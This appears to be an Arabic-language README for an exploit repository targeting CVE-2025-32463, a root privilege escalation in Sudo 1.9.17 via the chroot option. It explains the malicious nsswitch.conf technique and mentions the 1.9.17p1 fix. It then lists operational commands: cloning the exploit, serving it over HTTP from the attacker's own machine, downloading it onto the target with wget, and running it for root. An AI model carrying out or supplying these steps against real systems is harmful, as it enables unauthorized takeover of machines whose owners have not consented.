
نص برمجي Bash لاستغلال CVE-2025-32463، وهي ثغرة رفع صلاحيات محلية في Sudo 1.9.17 عبر خيار chroot، مما يتيح الوصول إلى صلاحيات الجذر على الأنظمة المتأثرة.
يحتوي إصدار Sudo 1.9.17 على ثغرة أمنية حرجة (CVE-2025-32463) تسمح للمستخدمين المحليين بالحصول على صلاحيات الجذر عبر استغلال خيار chroot، مما قد يؤدي إلى مخاطر أمنية خطيرة. يُنصح المستخدمون بالتحديث إلى الإصدار 1.9.17p1 أو أحدث للتخفيف من هذه المشكلة.
نظرة عامة على ثغرة Sudo 1.9.17:-
الثغرة في إصدار Sudo 1.9.17، والمعرّفة بـ CVE-2025-32463، هي خلل حرج يسمح للمستخدمين المحليين بالحصول على صلاحيات الجذر. تنشأ هذه المشكلة من تغيير في طريقة تعامل Sudo مع خيار --chroot (-R)، الذي يهدف إلى عزل العمليات عن طريق تغيير دليل الجذر الخاص بها.
كيف تعمل الثغرة:-
مشكلة تحليل المسار: في الإصدارات من 1.9.14 إلى 1.9.17، يقوم Sudo بتقييم خيار --chroot قبل التحقق من صلاحيات المستخدم. وهذا يسمح للمهاجمين بالتحكم في البيئة وتحميل مكتبات خبيثة.
خطوات الاستغلال:
يقوم المهاجم بإنشاء ملف nsswitch.conf خبيث في دليل يتحكم فيه. ثم ينفّذ Sudo مع الخيار -R، مما يجعل Sudo يقوم بتحميل إعدادات ومكتبات المهاجم، ومنحه صلاحيات الجذر.
لقد أنشأت سكربت bash باسم "cwoot.sh" والذي سيرفع الصلاحيات مباشرة إلى مستخدم الجذر بعد تنفيذه.
قم بما يلي:
قم بتنزيل السكربت من المستودع: git clone https://github.com/justjoeyking/CVE-2025-32463.git
على جهازك الخاص: python3 -m http.server 8080
على الجهاز الهدف: wget http://<own_IP_address>:8080/cwoot.sh
على الجهاز الهدف: chmod 755 cwoot.sh
نفّذ السكربت على الجهاز الهدف: ./cwoot.sh